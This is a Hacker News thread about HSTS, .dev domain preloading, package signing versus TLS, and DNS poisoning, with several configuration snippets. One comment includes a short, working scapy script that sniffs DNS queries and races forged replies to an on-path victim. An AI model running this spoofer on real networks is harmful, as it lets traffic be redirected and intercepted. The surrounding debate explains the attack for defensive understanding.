[HN Gopher] The fascinating world of HTTP Strict-Transport-Security
___________________________________________________________________
The fascinating world of HTTP Strict-Transport-Security
Author : vieiralucas
Score : 81 points
Date : 2023-03-30 12:25 UTC (10 hours ago)
(HTM) web link (ergomake.dev)
(TXT) w3m dump (ergomake.dev)
| Avamander wrote:
| HSTS is nice, but it's mostly opt-in, and the vast majority
| of sites won't enable it. For that reason I decided to test
| blocking outgoing port-80 connections; it's interesting to
| see what stops working. Some of the failures also raise the
| question of why they stop working at all.
|
| My favourite issue I stumbled upon is that Apple HomePods
| can't complete their first setup. I couldn't be bothered to
| dump exactly what they're doing, but it does raise a few
| questions. Quite a few other things break too, like
| Debian/Ubuntu apt repositories, Windows Update and the
| Store, and some games.
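|
| (For anyone repeating the experiment: a minimal sketch of
| the block with nftables; it assumes a default-accept output
| chain and is not necessarily how Avamander did it.)
|
|     # reject all outgoing plain-HTTP (port 80) connections
|     nft add table inet filter
|     nft add chain inet filter output \
|         '{ type filter hook output priority 0 ; policy accept ; }'
|     nft add rule inet filter output tcp dport 80 reject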
| LinuxBender wrote:
| Linux repos are expected to use cache-friendly methods, but
| they're not restricted from also using a secure transport.
| Security of the objects comes from GPG signing of the
| individual packages and of the repository metadata. The risk
| comes from GPG keys living on the cached repositories rather
| than only on a trusted source, and I have seen people
| install GPG keys from mirrors. I tried and failed, for
| example, to convince Red Hat to stop putting the public keys
| on the mirrors. Many companies internally mirror secondary
| community-hosted mirrors for their build systems, and those
| are prime candidates for takeover and GPG re-signing.
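|
| (A sketch of what that verification looks like by hand on a
| Debian-style repo; the keyring path is the stock Debian one,
| adjust for your distro.)
|
|     # check the detached signature on the repo metadata
|     gpgv --keyring /usr/share/keyrings/debian-archive-keyring.gpg \
|         Release.gpg Release
|     # package hashes are then validated against the
|     # now-authenticated Release/Packages files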
| Avamander wrote:
| GPG's track record of being robust against attacks is not
| that great, not to mention the complexity and attack
| surface of HTTP stacks. It would be great to make that
| attack surface available only to malicious mirrors, rather
| than to anyone on the network path.
| LinuxBender wrote:
| _It would be great to make that attack surface available
| only to malicious mirrors._
|
| That is exactly why I was pushing to remove the keys from
| the mirrors, but unofficially it's _too late_, as any change
| could cause disruptions for people who run private internal
| mirrors. I suggested simply announcing the change a year in
| advance, which, had that been done, would have happened
| years ago by now.
| RealStickman_ wrote:
| It's worth noting that deb packages are signed by the distro
| and any modification would be detected. That makes HTTPS
| unnecessary in this case.
| iso1631 wrote:
| The argument would be that it's easier to see what someone
| is downloading (and thus infer what they're installing) by
| sniffing HTTP traffic than HTTPS traffic.
|
| Sure, you can do some form of fingerprinting with request
| sizes over HTTPS, but that's another step and no guarantee
| (which of two identical-length files did they get, for
| example).
|
| How risky exposing this information really is, is another
| matter.
| sgtcodfish wrote:
| Having the communication in cleartext also makes it much
| easier for attackers to interfere with!
|
| Sure, they can't modify the .deb without failing signature
| verification, but they _can_ inject arbitrary delays in
| downloads or interfere with anything else which isn't
| signed (e.g. HTTP headers)
|
| Plus, if a vulnerability were discovered in the signing
| tool that enabled a signature-verification bypass with a
| certain signature format, HTTP would make it easy for
| attackers to exploit it.
|
| TLS shouldn't be optional for installing packages today IMO
| - the extra guarantees it provides are worth it even with
| signature verification enabled.
| Avamander wrote:
| But you have exposed the entire HTTP and GPG stack to the
| attacker. TLS would only be unnecessary if those were as
| secure and under as much scrutiny as TLS libraries are.
| ducksinhats wrote:
| Also worth noting that there have been apt RCEs capable of
| being exploited by a MITM.
|
| https://www.debian.org/security/2016/dsa-3733
|
| https://justi.cz/security/2019/01/22/apt-rce.html
|
| I really don't see how anyone can still defend not using TLS
| for Debian packages.
| kevincox wrote:
| In Firefox you can enable "HTTPS-Only Mode", which auto-
| upgrades all requests to HTTPS and shows a warning that you
| need to click through before downgrading to HTTP.
|
| It is quite interesting to see what is not HTTPS. One common
| case I have seen is tracking links in emails, which are
| often not HTTPS. I have even seen password-reset links
| wrapped in tracking links that redirect through HTTP. Those
| could be intercepted and used to reset your password before
| you do.
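|
| (For reference, that mode can also be pinned from user.js
| via the pref Firefox uses for it:)
|
|     user_pref("dom.security.https_only_mode", true);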
| ArchOversight wrote:
| Last I looked, Apple updates were delivered over HTTP using
| a CDN. The packages are signed and secured in other ways,
| but the goal was to make it easy for entities to proxy those
| connections (and/or use DNS to replace the IPs) so they
| could keep a cache of packages on their local network rather
| than having to go upstream for them.
|
| This worked really well when I did some work at a university
| and we wanted to keep the onslaught of Apple devices all
| downloading updates at the same time from overwhelming our
| network.
| Avamander wrote:
| A method like that should kinda never end up causing a denial
| of service. I also didn't drop any local port 80 traffic,
| which also makes that theory a bit less likely.
| jcrawfordor wrote:
| Sticking to HTTP enables transparent caching. So it's not
| that macOS/iOS try to connect to anything on the local
| network; they just connect directly to Apple via HTTP, which
| allows the local network to hijack the connection and serve
| a locally cached copy instead. This kind of thing is more
| common than you might think on corporate and institutional
| networks, because it can produce appreciable savings in
| internet bandwidth. Squid is a very common open-source
| solution for transparent forward proxying, but there are
| commercial products that are more common.
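|
| (A minimal squid.conf sketch of such a transparent cache;
| sizes and patterns are illustrative only:)
|
|     http_port 3128 intercept       # receives redirected port-80 traffic
|     cache_dir ufs /var/spool/squid 20000 16 256
|     maximum_object_size 512 MB     # large OS update payloads
|     refresh_pattern -i \.(pkg|ipsw)$ 1440 90% 43200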
|
| This kind of "friendly MITM" is sort of the baby that goes
| out with the bathwater on mandatory HTTPS, although I am
| personally of the opinion that it's not a big enough deal
| to block mandatory HTTPS---but there is debate there.
| stanleydrew wrote:
| > It's worth noticing that even the preload directive is non-
| standard, even though it's used as part of this entire "preload
| infrastructure" all across the web.
|
| This isn't exactly accurate. The HSTS RFC explicitly
| contemplates the preload list:
| https://www.rfc-editor.org/rfc/rfc6797#section-12.3
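|
| For reference, the header a site serves to be eligible for
| the preload list looks like:
|
|     Strict-Transport-Security: max-age=31536000; includeSubDomains; preload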
| josephcsible wrote:
| > Although serving HTTP content is not ideal, we probably
| shouldn't really stay in the way of our users if that's what they
| want to do.
|
| I don't agree with this position. I'd summarize my position as
| "if you want to do something stupid and dangerous, I don't want
| to be involved in it."
| lordgrenville wrote:
| Can someone explain how DNS poisoning actually happens in
| practice? Is it via an insecure Wi-Fi network? I assume most
| people's upstream DNS is provided by their ISP, which is
| probably basically competent. I use an Unbound server at
| home, but I really struggle to imagine a rogue actor
| compromising my ISP without anyone noticing.
| flumpcakes wrote:
| DNS is plaintext traffic on a well-known port. I just have
| to get your network traffic to pass through a device I own,
| and I can set your DNS results to anything I want, even if
| you explicitly specify a DNS server on your end.
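|
| (A sketch of how little that takes with Python/scapy once
| you're on-path; the answer address is a placeholder:)
|
|     from scapy.all import DNS, DNSQR, DNSRR, IP, UDP, send, sniff
|
|     def spoof(pkt):
|         # race the real server: answer every query we see
|         if pkt.haslayer(DNSQR) and pkt[DNS].qr == 0:
|             send(IP(src=pkt[IP].dst, dst=pkt[IP].src) /
|                  UDP(sport=53, dport=pkt[UDP].sport) /
|                  DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,
|                      an=DNSRR(rrname=pkt[DNSQR].qname, ttl=300,
|                               rdata="203.0.113.7")),
|                  verbose=False)
|
|     sniff(filter="udp dst port 53", prn=spoof)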
| nym375 wrote:
| Not directly answering re: DNS, but even if you get correct DNS
| results, at the IP layer there is always a risk of BGP
| hijacking
| (https://en.wikipedia.org/wiki/BGP_hijacking#Public_incidents).
| toast0 wrote:
| The easiest way is if the attacker is in the path between a DNS
| client (which could be your ISP's recursive server) and an
| authoritative server. But anytime there's caching, you have a
| risk of the wrong thing getting cached.
|
| There's the Kaminsky attack, if your ISP's DNS server
| doesn't properly randomize query IDs and source ports (and
| query case, for a few extra bits).
|
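| (Back-of-the-envelope odds for a blind off-path guess, per
| forged reply; the query-name letter count is an assumption:)
|
|     txid  = 2**16    # 16-bit DNS query ID
|     ports = 2**16    # randomized source port, best case
|     case  = 2**10    # 0x20 encoding: ~1 bit/letter, say 10 letters
|
|     print(1 / txid)                   # ID alone:  ~1.5e-05
|     print(1 / (txid * ports))         # + ports:   ~2.3e-10
|     print(1 / (txid * ports * case))  # + case:    ~2.2e-13
|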
| But you can also get unintentionally wrong information
| cached if something flips a bit on the way, as DNS doesn't
| have end-to-end integrity.
| recursive wrote:
| In a conflict between HTTP and HTTPS, why solve it by
| settling on HTTP? Switching to all-HTTPS usually seems like
| the better option.
| kevincox wrote:
| Because HTTPS is harder. The user could be loading HTTP
| content from another host on their page. To support this
| you would basically need to modify their page (including
| scripts) to rewrite all URLs to HTTPS, which is nearly
| impossible to do perfectly. I think they are right to give
| their customers this option if they want it.
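|
| (A naive Python sketch of why that's hard; this catches only
| simple attributes and misses URLs assembled in inline
| scripts, CSS, srcset, and so on:)
|
|     import re
|
|     def upgrade_urls(html: str) -> str:
|         # upgrade http:// in plain src/href/action attributes
|         return re.sub(r'(src|href|action)=(["\'])http://',
|                       r'\1=\2https://', html)
|
|     print(upgrade_urls('<img src="http://example.com/a.png">'))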
| superkuh wrote:
| It depends on who you are and who you are trying to reach.
| If you are a for-profit business or institutional "person",
| then you only really need to reach the people who give you
| money or to whom you provide services. That means blocking
| people due to HTTPS CA or cert issues is okay. If you're a
| human person or a government, then you want the information
| or service to be available to as many people as possible,
| and that means HTTP+HTTPS, even if it means allowing older
| versions of HTTPS.
| Tobu wrote:
| Indeed, here's GitHub doing exactly that (fixing mixed content
| warnings by reverse-proxying third-party HTTP content), back in
| 2010: https://github.blog/2010-11-13-sidejack-prevention-
| phase-3-s...
| wepple wrote:
| It's literally on the front page of https://get.dev that the
| whole TLD is preloaded; I'm not sure why it comes as such a
| surprise.
|
| I get that ergomake has to bend to the whims of their
| customers, but TLS certs are free, so engineering your
| systems to allow non-TLS HTTP in 2023 is a huge regression.
| [deleted]
| 1vuio0pswjnm7 wrote:
| "After some research, we found this blog post by Mattias Geniar,
| which explained how Google was forcing .dev domains to be served
| via HTTPS through a preloaded HSTS setting in their Chrome
| browsers - which Firefox later adopted too."
|
| Imagine if Google did not have and control its own browser,
| Chrome. In theory, Google then could not force the author to
| purchase a .dev domain. What's sad here is that, according
| to the author, Mozilla has followed Google's lead. Note this
| has nothing to do with the fact that Mozilla's main source
| of income is Google, and that Chrome was developed by former
| Mozilla employees who went to work for Google.
|
| It is possible to use a browser other than Chrome or Firefox
| (or Safari, Edge, Brave, etc.) that has no XSS risk because
| the browser does not auto-load resources. This alleviates
| the need for HSTS as a means of preventing XSS (NB: there
| are other purported justifications for using HSTS besides
| preventing XSS). How do I know it is possible? Because I use
| one, for recreational web use like reading sites submitted
| to HN. Freedom of choice.
|
| It's also possible to run a localhost-bound forward proxy where
| one can set HSTS to whatever value one desires, or remove the
| header entirely. Instead of relying on an advertising company,
| one can use the proxy to "upgrade" http:// to https://. All
| outgoing HTTP requests can be encrypted and connections to local
| port 80 can be forwarded to remote 443. I know it's possible
| because this is what I do. Unlike HSTS, the proxy "fixes" any
| application sending HTTP requests, not only a browser that
| supports HSTS. The proxy can also limit the sites the user wishes
| to trust.^1
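|
| (A stripped-down Python sketch of such a proxy: no keep-
| alive, no error handling, and it trusts the Host header, so
| treat it purely as an illustration:)
|
|     import socket, ssl, threading
|
|     def handle(client):
|         req = client.recv(65536)  # one plain-HTTP request
|         host = next(l.split(b":")[1].strip().decode()
|                     for l in req.split(b"\r\n")
|                     if l.lower().startswith(b"host:"))
|         ctx = ssl.create_default_context()
|         with socket.create_connection((host, 443)) as raw, \
|              ctx.wrap_socket(raw, server_hostname=host) as tls:
|             tls.sendall(req)           # replay the request over TLS
|             while (chunk := tls.recv(65536)):
|                 client.sendall(chunk)  # relay the response back
|         client.close()
|
|     srv = socket.create_server(("127.0.0.1", 8080))
|     while True:
|         conn, _ = srv.accept()
|         threading.Thread(target=handle, args=(conn,),
|                          daemon=True).start()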
|
| That is the real issue I have with HSTS. It further removes
| (i.e., makes more difficult) the ability of the user to determine
| what sites she will trust, placing that decision in the hands of
| third parties, namely those that control the "CA system". It's
| already annoying enough that Chrome forces users to type a
| shibboleth into a keylogger to get past certificate warnings.
| HSTS makes it even more annoying. It is unfriendly for users who
| in some situations trust their own decision-making more than they
| trust Google and CAs.
| sebstefan wrote:
| Thank god for clear errors. Can you imagine if you just got "Bad
| request" and had to figure that shit out with no clues?
| psd1 wrote:
| Thank the gods for Fiddler
| adql wrote:
| It also has funny interactions with expired certs. I
| remember some obscure OSS app's page being inaccessible via
| browser because:
|
| * the author forgot to renew the cert, like, the day before
|
| * the author had also set up HSTS, and both browsers said
| "nope, we won't even let you add an exception for this one".
| dumpsterdiver wrote:
| That's kind of the point of HSTS. Your browser remembered that
| there was previously a valid certificate, and when the
| certificate expired your browser honored the HSTS header. If
| you clear your browser cache you should be able to access the
| site again.
| tialaramex wrote:
| Not so much "funny" as necessary.
|
| The alternative is that if I can mess up users' HTTPS
| connections to your site, they just click the "exception"
| button, and that undoes all the benefits of HSTS.
| VWWHFSfQ wrote:
| I don't know if it's still the case, but it used to be that
| if you accidentally set a localhost webserver to redirect to
| HTTPS while you were developing, then browsers would
| remember that and from then on require HTTPS for all of
| eternity, until you could figure out how to make it stop,
| which was mostly impossible. It ended up in some HSTS file
| somewhere deep in the browser's cache files. Horrible
| technology.
| stanleydrew wrote:
| I think you're just talking about aggressive browser caching of
| 301 responses, which isn't related to TLS or HSTS. It is pretty
| common to respond to plaintext HTTP requests with a 301 to the
| equivalent TLS URL, so I understand the confusion.
| amichal wrote:
| Its also this cache chrome://net-internals/#hsts (or other
| vendor equivalent)
| VWWHFSfQ wrote:
| It's both: the 301, and the server responding with the HSTS
| header.
| stanleydrew wrote:
| Well yes it's common to return both, but the HSTS header
| explicitly has a max-age parameter so the browser is bound
| by the spec to enforce TLS connections until the max-age is
| reached. So when you say browsers would "require HTTPS for
| all of eternity" my assumption was that you didn't like the
| 301 caching.
| xg15 wrote:
| Does anyone know why Google did this for .dev of all things?
| HSTS makes sense for any other domain, but specifically
| picking a TLD that people are known to use for internal
| testing, then shelling out the money to buy it only so you
| can force HSTS on it, comes across as a real dick move,
| honestly.
|
| Or was Google so caught up in their good-guy complex that
| they felt justified in performing a pedagogical intervention
| on the entire industry?
| soneil wrote:
| They did it for a good handful of TLDs, including .app,
| .day, .dev, .page, and .new. I get the impression they're
| pushing for it to be absolutely everywhere, and "greenfield"
| sites are an easier place to start than breaking things that
| already work.
| lucasfcosta wrote:
| I think it's not that bad for this to be the default.
|
| To be honest, people should've never used `.dev` for testing in
| the first place, given that IANA has reserved the `.test`
| domain specifically for that.
|
| By making HTTPS the default for `.dev` they can save a few
| milliseconds in rewriting the requests and a few bytes for
| the preload header.
|
| In any case, I think it'd be okay for it to be the default, but
| I think it's _not_ okay for it to be immutable. I should be
| able to remove my .dev domain from the preload list if I want
| to.
|
| TL;DR: Ok default but IMO it should be possible to opt-out.
| suprfsat wrote:
| Also I was using TURKTRUST and it should be possible to opt
| out of whatever the security nerds thought was best for me
| too.
| toast0 wrote:
| I believe you can opt your domain out, but in order to do
| so you need to serve HTTPS and send an HSTS header with
| max-age=0. The blog post mentions turning off the HSTS
| header, but not setting it to max-age=0, which is probably
| what they needed to do (plus a redirect from https to http
| for the specific pages they want served via http).
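|
| (Concretely, that removal signal, served over HTTPS, is
| just:)
|
|     Strict-Transport-Security: max-age=0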
| account42 wrote:
| > To be honest, people should've never used `.dev` for
| testing in the first place, given that IANA has reserved the
| `.test` domain specifically for that.
|
| The TLD namespace was effectively frozen for a long time
| until ICANN got greedy and decided to sell parts of it off.
| zamnos wrote:
| RFC 2606: https://www.rfc-editor.org/rfc/rfc2606.html
|
| The problem with standards is no one ever reads them. This
| was published in 1999.
| amichal wrote:
| And for a local application env you should use .localhost;
| .test was for testing DNS infra ("undefined behaviour" for
| your local resolver).
| suprfsat wrote:
| You mean we're not supposed to run our Active Directory
| on 'corp.com'?
| ArchOversight wrote:
| No, you run it on .corp like everyone else. :P
| chrismorgan wrote:
| _Why_ should you be able to opt out? I can't think of any
| valid reason.
| hannob wrote:
| If you think about it, what Google did was actually quite
| smart.
|
| By forcing HSTS for .dev they broke the setups of people who
| had hijacked a domain name they didn't own and that wasn't
| made for that purpose (and, as others pointed out, there are
| TLDs reserved for testing that you can use). So they forced
| those people to fix their stuff. If they hadn't done that,
| .dev probably would have gained the reputation of being the
| TLD that doesn't work, because all kinds of people had
| redirected it to testing hosts.
| sebstefan wrote:
| Why does that affect the .dev TLD specifically?
| matharmin wrote:
| Because many people (myself included) used .dev for
| internal testing domains before it was a TLD, either by
| specifying the domains in a hosts file or with a local
| DNS server. Now I use .test for that, which is actually a
| reserved suffix that will never become a real TLD.
| qwertox wrote:
| I have a shortname.cc domain which I use for testing.
| This allows me to issue Let's Encrypt certificates for
| *.shortname.cc, which includes local.shortname.cc.
|
| The internal DNS server masks the public one, so that I
| can assign local IPs at will, use HTTP or HTTPS at will,
| and when I'm outside of the network, the devices will
| contact the public DNS server and use the actual public
| IP of the network to access a limited set of servers
| (like ejabberd). These servers then stay accessible on
| the inside, but through the local IPs, so that traffic
| doesn't have to leave the local network and touch the edge
| router (which also solves some NAT issues with WebSocket
| connections).
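|
| (For anyone replicating this, the internal override is a
| one-liner in e.g. dnsmasq; name and IP here are examples:)
|
|     # answer locally with a LAN address; the public zone
|     # keeps serving the public IP to everyone else
|     address=/local.shortname.cc/192.168.1.10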
| chatmasta wrote:
| Just to expand on why you should use .test for this: it's
| a reserved TLD according to RFC 2606 [0] and should
| therefore be guaranteed never to be issued by any
| registrar. Alternatively, you could use any of the other
| 11 reserved test TLDs: .测试, .परीक्षा, .испытание,
| .테스트, .טעסט, .測試, .آزمایشی, .பரிட்சை, .δοκιμή,
| .إختبار, .テスト
|
| e.g. we use `https://www.splitgraph.test` for local
| development, which is nice because we avoid a whole class
| of "works in dev" bugs that you get with
| `http://localhost:3001`
|
| For the certificate, we use a self-signed certificate
| signed by a root cert generated by mkcert [1] locally on
| each developer's machine (to avoid sharing a root cert
| that could be used to MITM each other).
|
| [0] https://en.wikipedia.org/wiki/.test
|
| [1] https://github.com/FiloSottile/mkcert
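|
| (The mkcert flow is roughly two commands per developer
| machine; the wildcard name is this example's, swap in your
| own:)
|
|     mkcert -install             # create and trust a local root CA
|     mkcert "*.splitgraph.test"  # issue a leaf cert signed by it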
| RulerOf wrote:
| I created a subdomain like local.example.com and pointed
| it at 127.0.0.1 in the DNS.
|
| I wanted to suggest using a .test domain but managing the
| hosts file is always really clunky, even with a slick
| tool like hostess[1].
|
| 1: https://github.com/cbednarski/hostess
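|
| (Both variants are one-liners; names are placeholders. The
| hosts-file version:)
|
|     127.0.0.1   myapp.test
|
| (and the public-DNS version, as a zone-file record:)
|
|     local.example.com. 300 IN A 127.0.0.1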
| acatton wrote:
| Because Google manages the .dev TLD.
| https://en.wikipedia.org/wiki/.dev
|
| It's their TLD, they do whatever they want.
___________________________________________________________________
(page generated 2023-03-30 23:01 UTC)